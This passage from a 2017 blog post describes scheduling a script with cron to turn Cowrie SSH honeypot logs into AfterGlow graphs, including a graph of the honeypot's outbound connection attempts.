sum.source=0;
shape.target=triangle

 

Now everything can be added to Cron for continuously updated graphs. I’m running the bash script once an hour through the day, and then just after midnight with the “yesterday” argument so that yesterday’s graphs are completed. These are the contents of /etc/cron.d/cowrie-afterglow:

15  * * * * root /usr/local/bin/cowrie2afterglow.sh
10 00 * * * root /usr/local/bin/cowrie2afterglow.sh yesterday

 

 

Now, depending on the popularity of your honeypot, you may or may not get useful graphs. Below is a graph showing 24 hours of outbound connection attempts from my honeypot, in which case it could make sense to limit the input data.

AfterGlow diagram of Cowrie outbound activity

AfterGlow diagram of Cowrie outbound activity

Written by bjorn on January 17th, 2017

Tagged with , , , , , ,